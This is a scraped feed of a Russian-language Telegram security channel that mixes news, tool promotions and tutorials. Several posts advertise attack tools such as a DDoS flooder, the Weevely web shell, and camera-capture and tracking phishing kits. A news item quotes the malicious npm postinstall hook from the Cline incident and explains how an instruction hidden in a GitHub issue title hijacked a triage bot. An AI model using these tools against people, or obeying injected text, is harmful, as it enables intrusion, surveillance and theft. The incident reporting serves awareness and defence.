searchack | Unsorted

Telegram-канал searchack - Не хакинг, а ИБ

-

Главный архив с лучшими материалами со всего интернета по ИБ и этичному хакингу. Реклама/сотрудничество: @One_Daniil Владелец: @awenft Мы на бирже: https://telega.in/c/searchack

Subscribe to a channel

Не хакинг, а ИБ

😠 Инструменты OSINT

OSINT (Open Source Intelligence) — это поиск и анализ информации из открытых источников. Ниже представлен список наиболее эффективных инструментов, разбитых по категориям.


Главные агрегаторы и фреймворки
OSINT Framework — интерактивная карта, содержащая сотни ресурсов для поиска по любым категориям (почта, IP, соцсети, даркнет).
Maltego — мощная программа для визуализации связей между людьми, компаниями, доменами и IP-адресами.
IntelTechniques — коллекция продвинутых инструментов для глубокого поиска от эксперта Майкла Баззелла.

Поиск по никнеймам и соцсетям
Sherlock — консольная утилита для поиска одного и того же ника на более чем 300 сайтах.
BlackBird — быстрый поиск профилей по никнейму.
Social Searcher — мониторинг упоминаний в реальном времени во всех популярных соцсетях.

Поиск по Email и телефонам
Epieos — позволяет найти профили Google, Skype и другие данные, связанные с адресом электронной почты, без отправки письма.
Hunter.io — поиск корпоративных email-адресов по домену компании.
PhoneInfoga — один из самых продвинутых инструментов для сбора информации о номере телефона.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🔒 HellPot: как настроить «бесконечную ловушку» для вредоносных HTTP-ботов

В этой статье мы подробно рассмотрим, как HellPot помогает бороться с несанкционированными атаками, какие функции и возможности он предоставляет, а также как его настроить и использовать на вашем сервере.

— Готовы отправить ботов в виртуальный ад? Давайте разбираться, как это сделать с помощью HellPot.

🗄 Источник – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🤖 Обнаружение защиты веб-приложений

WAFW00F – это инструмент для идентификации продуктов защиты веб-приложений (файерволов веб-приложений, WAF)

WAF (Web Application Firewall) – это система, которая устанавливается перед веб-сервером. Она помогает обнаружить и заблокировать различные виды атак на веб-приложения


— Он работает путём отправки специально сформированных HTTP-запросов на целевой сайт и анализа ответов, чтобы определить, есть ли там WAF, а также версию и производителя используемого фильтра

🗄 Репозиторий на GitHub – линк.
🗄 Определяем тип WAF с помощью WafW00f – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

📝 Подборка материалов по мобильной безопасности «Awesome Mobile Security»

— Здесь собраны материалы, которые могут быть полезны с практической точки зрения: из них можно узнать о новых способах атак на приложения, прочитать о новых уязвимостях, изучить, как работают механизмы операционной системы и т.д.

Для удобства все материалы, которые есть на русском языке, выделены в подпункты

🗄 Читать статью – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

⚡️РОЗЫГРЫШ В ЧЕСТЬ ОТКРЫТИЯ В MAX

Теперь наши каналы доступны не только здесь, но и на платформе MAX.  В честь этого события разыгрываем три приза, которые усилят вашу защиту в сети.

ПРИЗОВОЙ ФОНД:
⚠️ 1 МЕСТО: YubiKey 5 Series
Физический ключ, который делает двухфакторную аутентификацию неуязвимой. Никакой фишинг и слив паролей не страшны, пока ключ у вас.

⚠️ 2 МЕСТО: SATOSHI VPN на 1 год
Полная анонимность и шифрование трафика. Ваши данные под защитой в любых сетях.

⚠️ 3 МЕСТО: Книга "Хакерская самооборона" (Андрей Жуков, 2026)
Актуальная новинка по активной обороне. Учитесь думать как хакер, чтобы защищаться от реальных угроз.

📎 УСЛОВИЯ ПРОСТЫЕ:
Быть подписанным на этот канал (где вы читаете пост).

Быть подписанным на все 4 канала в MAX по ссылкам ниже.
→ max.ru/becaps
→ max.ru/cyberins
→ max.ru/itbook_library
→ max.ru/nsis_cybersec

📌 Нажать кнопку "Участвую" под этим постом.

Итоги подведём ровно через 20 дней с помощью рандомайзера 28.03.26 14:00MSK.

Читать полностью…

Не хакинг, а ИБ

❗️ Инструмент имитации DDoS-атак

DDoS-Ripper – инструмент для тестирования сети, который имитирует атаки Distributed Denial of Service (DDoS)

— Он генерирует высокие объёмы HTTP-запросов с одной машины с помощью нескольких параллельных потоков

DDoS-Ripper совместим с несколькими платформами, включая Linux, Windows, MacOS и Termux


🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🛡 Большое руководство по работе с Angie

Этот цикл статей будет посвящен веб‑серверу Angie

Angie
это современный веб-сервер и обратный прокси с открытым исходным кодом, основанный на веб-сервере Nginx

Проект был инициирован в 2013 году компанией Angie Software с целью улучшить возможности Nginx, а также расширить его функциональность для большего удобства использования в корпоративных и облачных средах

Навигация по циклу:

🗄 Почему стоит переходить на Angie.
🗄 Установка Angie из пакетов и в докере.
🗄 Переезд с Nginx на Angie. Пошаговая инструкция.
🗄 Настройка location в Angie. Разделение динамических и статических запросов.
🗄 Перенаправления в Angie: return, rewrite и примеры их применения.
🗄 Сжатие текста в Angie: статика, динамика, производительность.
🗄 Серверное кэширование в Angie: тонкости настройки.
🗄 Настройка TLS в Angie: безопасность и скорость.
🗄 Настройка Angie в роли обратного HTTP-прокси.
🗄 Балансировка нагрузки для HTTP(S) в Angie.
🗄 Мониторинг Angie с помощью Console Light и API.
🗄 Балансировка и проксирование L4-трафика в Angie.
🗄 Клиентское кэширование в Angie.
🗄 Динамические группы проксируемых серверов в Angie.
🗄 Мониторинг Angie с Prometheus и Grafana.
🗄 Отказоустойчивый кластер Angie с VRRP и Keepalived.
🗄 Контроль доступа в Angie.
🗄 Аутентификация клиентов в Angie с помощью TLS-сертификатов.
🗄 Кастомизация Angie (njs, Lua, Perl).
🗄 Запуск CGI-скриптов в Angie.
🗄 Защита от DoS-атак в Angie стандартными модулями.
🗄 Защита от DoS-атак в Angie (дополнительные средства).


// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

❗️ Веб-шелл для автоматического заражения сети

Weevely
– это веб-шелл командной строки, динамически распространяемый по сети во время выполнения

Просто закиньте PHP скрипт, и программа обеспечит похожий на ssh терминал даже в ограниченном окружении


— Оставляющий мало следов агент и более 30 модулей формируют расширяемый фреймворк для:
администрирования веб-аккаунтов;
постэксплуатационного повышения привилегий веб-серверов;
и латерального продвижения по сети.

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

😈 Хакинг бытовой техники: от реверса стиралки к созданию открытого сервисного ПО

— Сегодня разберем доклад Hacking Washing Machines с конференции 39C3 и посмотрим, как мелкая бытовая неисправность привела к полноценному реверсу стиралки, а затем – к созданию свободной утилиты, которая заменяет закрытый фирменный софт для ремонта техники Miele

Доклад получился объемным, поэтому для удобства читателей он разделен на две части:
1. Первая про опыт исследования техники Miele
2. Второй про шину D-Bus как универсальную отмычку к экосистеме бренда BSH

🗄 Читать статью – линк.
🗄 Хакинг бытовой техники: одна шина, чтобы управлять всеми – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🦺 В 2025 году из банкоматов похитили более 20 млн долларов

ФБР опубликовало бюллетень, в котором предупреждает о резком росте атак типа джекпоттинг (jackpotting) на банкоматы в США

⚠️ Только в 2025 году зафиксировано более 700 подобных инцидентов, а суммарный ущерб превысил 20 млн долларов

Суть джекпоттинга: злоумышленники получают физический доступ к банкомату, устанавливают на него вредоносное ПО, и малварь напрямую отдает команды модулю выдачи наличных

Обычно вся операция занимает считанные минуты, а финансовые организации и операторы банкоматов узнают о произошедшем, когда деньги уже похищены


— Главным инструментом атакующих правоохранители считают малварь Ploutus, которая существует уже более 10 лет

🗄 Источник – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

Шифрование метаданных в мессенджере: HMAC-SHA256 анонимные пары, timing obfuscation и отравление собственных логов

— В этой статье автор подробно объяснит инженерные решения, к которым пришёл в ходе защиты метаданных: от криптографических примитивов до С++ кода и SQL-схемы

А также рассмотрим, где подход имеет ограничения и чем отличается от того, что делают Signal и Tor

Содержание статьи:

1. Зачем вообще шифровать метаданные?
2. Модель угроз: что знает сервер
3. Архитектура: четыре уровня скрытности
4. HMAC-SHA256 Anonymous Pairs — ядро системы
5. Отравление собственных логов
6. Push-уведомления как канал утечки
7. Timing Obfuscation: случайные задержки против корреляционного анализа
8. Мердж настроек: дипломатия приватности
9. Хранение и production-реалии
10. Полная картина: что видит атакующий с root-доступом к серверу
11. Сравнение с аналогами: Signal, Tor, Matrix
12. Честные ограничения и что не работает
13. Заключение и ссылки


🗄 Читать статью – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

☁️ Phishing: инструмент захвата камеры с помощью фишинга

WishFish
– это инструмент для взлома веб-камер или фронтальных камер с чужих компьютеров и телефонов

Он позволяет генерировать различные фишинговые веб-ссылки, которые могут сфотографировать фронтальную камеру жертвы и дать целевой IP-адрес

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🦣 Банкер Mamont атакует пользователей через Telegram

Исследователи зафиксировали новую волну распространения банковского трояна Mamont, нацеленного на Android-устройства

— Злоумышленники эксплуатируют актуальную повестку и маскируют вредонос под приложение для ускорения Telegram и обхода ограничений

Механика атаки проста: злоумышленники оставляют комментарии под публикациями в популярных Telegram-каналах и предлагают скачать APK, который якобы ускоряет работу замедленного мессенджера

Для этого жертву направляют в отдельный канал, откуда и предлагается загрузить файл, но вместо заявленной утилиты на устройство попадает вредонос


⚠️ Вредоносная кампания стартовала 14 февраля и уже успела затронуть тысячи российских пользователей

🗄 Источник – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

❗️ OSINT: собираем досье на человека

Trape – это инструмент для OSINT-анализа, который позволяет отслеживать активность пользователей в интернете

Основные возможности:

Может определять местоположение пользователя с точностью до 99%, обходя запросы на разрешение в браузере
Позволяет проводить фишинговые атаки и внедрять вредоносные скрипты, что полезно для тестирования уязвимостей
Можно получить информацию о скорости интернета пользователя и устройствах в его сети

 
— Он использует Python и Flask для создания сервера, который имитирует веб-сайт – когда пользователь заходит на этот сайт, инструмент собирает данные о его активности

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

Хочешь в хакинг? Тогда читай мой канал. В нём ты узнаешь с чего начать, увидишь интересные кейсы из социальной инженерии, прочувствуешь все прелести пентеста на себе прочитаешь про забавные случаи из мира ИБ и посмеёшься над тупыми инфоцыгами.

🐈‍⬛Дорожная карта со стажёра до мидла

🐈‍⬛ О важности методологии в ИБ

🐈‍⬛ Переиграли мошенника и угнали его акк

Сфинкс. Подписаться.

Читать полностью…

Не хакинг, а ИБ

☝️ Как расследовать кибератаку за 24 часа: пошаговое руководство

Первые 24 часа после обнаружения кибератаки — это критический период, который определяет успех всего расследования. В это время злоумышленники еще могут находиться в системе, следы не успели исчезнуть, а у экспертов есть максимальные шансы собрать качественные доказательства.

Статистика показывает, что 78% успешных расследований завершаются в первые 24 часа, когда команда реагирования действует.


В данном руководстве полное руководство по быстрому расследованию кибератак.

Алгоритм реагирования, инструменты для сбора доказательств и координация с правоохранительными органами.

🗄 Читать статью – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

Встройте LLM в разработку правильно ↗️

ИИ позволяет генерировать код быстрее. Но его бесконтрольное использование часто приводит к багам, уязвимостям и росту технического долга.

Как этого избежать и сделать процесс безопасным — расскажет эксперт Cloud.ru на вебинаре 17 марта.

Вы узнаете:

➡️как быстро запустить и контролировать генерацию кода с LLM в VS Code

➡️как выстроить правила, ограничения и стандарты при работе с LLM

➡️как настроить ранний контроль качества и безопасности через SonarQube

➡️как использовать MCP-серверы для качественного кода


Не забудьте зарегистрироваться 🌐

Читать полностью…

Не хакинг, а ИБ

📄 Краткая документация по командной строке

tldr-pages – это проект, который предоставляет краткую и понятную документацию командной строки для быстрого ознакомления

— Она призвана помочь пользователям быстро понять, как использовать команду, не продираясь через многословные страницы руководства (man pages)

🗄 Репозиторий на GitHub – линк.
🗄 tldr — альтернатива man с названием, говорящим за себя – линк.
🗄 TLDR pages — замена справке man, показывающая только самое важное – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

😂 Агент под прикрытием: как один заголовок-промпт на GitHub помог взломать 4000 компьютеров

17 февраля в репозитории npm была опубликована версия cline@2.3.0. С виду – ничего особенного: исполняемый файл был идентичен предыдущему байт в байт

Лишь в файле package.json притаилась одна лишняя строчка:

 "postinstall": "npm install -g openclaw@latest"


В течение следующих восьми часов каждый разработчик, решивший установить или обновить Cline, невольно устанавливал OpenClaw

— Это отдельный ИИ-агент с полным доступом к системе, который устанавливался глобально и без какого-либо спроса – пакет успели скачать около 4000 раз, прежде чем его удалили из общего доступа

Но самое поразительное здесь не сама начинка вредоноса – весь фокус в том, как именно злоумышленник раздобыл npm-токен – ключ от всех дверей

⚠️ Оказалось, он просто спрятал инструкцию (промпт) прямо в заголовке тикета на GitHub

Бот, занимавшийся сортировкой заявок, прочитал этот заголовок, принял его за приказ и послушно исполнил

🗄 Читать статью – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

😈 Сын правительственного подрядчика украл у Службы маршалов криптовалюту на 46 млн долларов

Арестован сын правительственного подрядчика США, Джон Дагита, которого обвиняют в хищении более 46 млн долларов в криптовалюте у Службы маршалов

Джон Дагита – сын Дина Дагиты, президента и генерального директора компании Command Services & Support (CMDSS), базирующейся в Вирджинии

⚠️ С октября 2024 года эта фирма помогала Службе маршалов США управлять и распоряжаться конфискованными у преступников цифровыми активами

«В конце января 2026 года я раскрыл, как Джон украл более 46 млн долларов в конфискованных криптоактивах у правительства США, злоупотребив доступом к ресурсам CMDSS — компании его отца, у которой был контракт со Службой маршалов.

Затем Джон несколько раз дразнил меня через свой Telegram-канал и проводил dust-атаки на мой публичный кошелек, используя украденные средства. Ну и кто смеется теперь, Джон?» — написал известный блокчейн-аналитик ZachXBT


По данным ZachXBT, Дагита сам себя раскрыл во время конфликта с другим злоумышленником в приватном чате Telegram, который был записан

В этой переписке он продемонстрировал, что способен в реальном времени перемещать крупные суммы между двумя криптокошельками

Дальнейший анализ позволил связать эти кошельки с правительственными активами, конфискованными после взлома биржи Bitfinex

🗄 Источник – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

📝 Awesome Hacking — золотая жила для специалистов по безопасности

Awesome Hacking
– это кураторская подборка из более чем 50 тематических списков ресурсов по информационной безопасности

Создатели собрали в одном месте:
Инструменты для пентеста
Обучающие материалы
Примеры эксплойтов
Лабораторные среды
Исследования по безопасности

Проект насчитывает почти 100 тысяч звезд на GitHub и регулярно обновляется сообществом

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

😂 Налоговая служба Южной Кореи случайно раскрыла seed-фразу для изъятого криптокошелька

Национальная налоговая служба Южной Кореи (National Tax Service, NTS) отчиталась о результатах операции против 124 крупных неплательщиков налогов


⚠️ В ходе рейдов удалось конфисковать активы на общую сумму 8,1 млрд вон (~5,6 млн $), включая наличные, предметы роскоши и криптовалюту

— Для наглядности они решили приложить к своему пресс-релизу фотографии изъятого у неплательщиков имущества

Среди них оказался снимок аппаратного кошелька Ledger, а также на фото попала и рукописная заметка с seed-фразой от него

Результат не заставил себя ждать: спустя пару часасов неизвестные вывели с конфискованного кошелька 4 млн токенов Pre-Retogeum (PRTG), оценивавшихся примерно в 4,8 млн $ на момент кражи

🗄 Источник – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🖥 Ваша повседневная шпаргалка по Matplotlib

Предлагаем вашему вниманию полное руководство по визуализации на Python

Matplotlib – библиотека на Python для визуализации данных двумерной и трёхмерной графикой

Он имеет отличную поддержку множеством сред, таких, как веб-серверы приложений, графические библиотеки пользовательского интерфейса, Jupiter Notebook, iPython Notebook и оболочка iPython

Выкладывать еще материалы по программированию?
💊 – да
🗿 – не стоит


🗄 Шпаргалка – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🧰 Набор инструментов для тестирования на проникновение

В данном репозитории собрали:
– Анонимное сокрытие инструментов
– Инструменты сбора информации
– Генераторы списков слов
– Инструменты беспроводной атаки
– Инструменты для внедрения SQL-запросов
– Инструменты фишинговой атаки
– Инструменты веб-атак
– Инструменты для последующей эксплуатации
– Инструменты судебной экспертизы
– Инструменты для создания полезной нагрузки
– Платформы для использования эксплойтов
– Обратный инжиниринг
– Сканирование веб-страниц
– Инструменты для проведения DDOS-атак
– Инструменты удаленного администратора
(RAT)
– Инструменты XSS-атаки
– Инструменты для стеганографии

Репозиторий постоянно обновляется!

🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

📝 Шпаргалка по Web Security

Awesome OSCP – это тщательно подобранная коллекция ресурсов, инструментов, руководств и шпаргалок, специально созданная для помощи в подготовке к экзамену Offensive Security Certified Professional, но невероятно полезная и для любого пентестера.

Ключевые разделы:
— Подготовка и основы;
— Фундаментальные навыки;
— Enumeration и разведка;
— Эксплуатация;
— Пост-эксплуатация.


🗄 Репозиторий на GitHub – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🐕 BloodHound — как увидеть скрытые угрозы в вашей Active Directory

Представьте, что вы администратор безопасности в крупной компании

В вашей Active Directory сотни пользователей, групп и компьютеров, связанных сложными отношениями

Как найти уязвимости в этом лабиринте? Вот где на помощь приходит BloodHound – инструмент, который превращает хаос разрешений в понятную карту угроз

🗄 Читать статью – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

📄 X86/Win32 Reverse Engineering CheatSheet

— Шпаргалка содержит информацию о регистрах, инструкциях и терминах, связанных с реверс-инжинирингом программного обеспечения для архитектуры x86 и операционной системы Win32

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

🛡 Чем занимается DevSecOps? Обзор инструментов

— В материале мы разберемся, чем на практике занимается DevSecOps и какие инструменты используются в повседневной работе

Поговорим об SSDLC и откуда в этой аббревиатуре появилось слово «Security», а также в какой момент проекту стоит задуматься о внедрении безопасного жизненного цикла разработки;
Отдельно остановимся на том, как внедрять SSDLC без вреда для проекта и обсудим чек-лист оценки зрелости;
Погрузимся в облако тегов DevSecOps, разберем ключевые практики и инструменты, а также поговорим о том, что делать после того, как все эти процессы уже внедрены.

🗄 Читать статью – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

👩‍💻 Nginx: шпаргалка

— Представляю вашему вниманию шпаргалку по основным секциям Nginx, которые следует держать под рукой

Nginx ("engine x") – это HTTP-сервер, обратный прокси сервер с поддержкой кеширования и балансировки нагрузки, TCP/UDP прокси-сервер, а также почтовый прокси-сервер


В ней приведены самые частые функции: включение SSL, переадресация, раздача статики и т.д.

🗄 Шпаргалка – линк.

// Не хакинг, а ИБ

Читать полностью…

Не хакинг, а ИБ

☁️ Хакеры используют артефакты Claude для распространения малвари для macOS

— Злоумышленники запустили ClickFix-кампанию, в которой используют публичные артефакты чат-бота Claude компании Anthropic и платную рекламу в поиске Google

Артефакты Claude – это публичный контент, созданный пользователем с помощью LLM

Это может быть некая инструкция, код, отрывок текста и так далее


Цель атакующих: обманом вынудить пользователей macOS выполнить команду в терминале, которая установит на устройство инфостилер

Гайд с вредоносной инструкцией уже просмотрели более 15 000 раз

🗄 Источник – линк.

// Не хакинг, а ИБ

Читать полностью…
Subscribe to a channel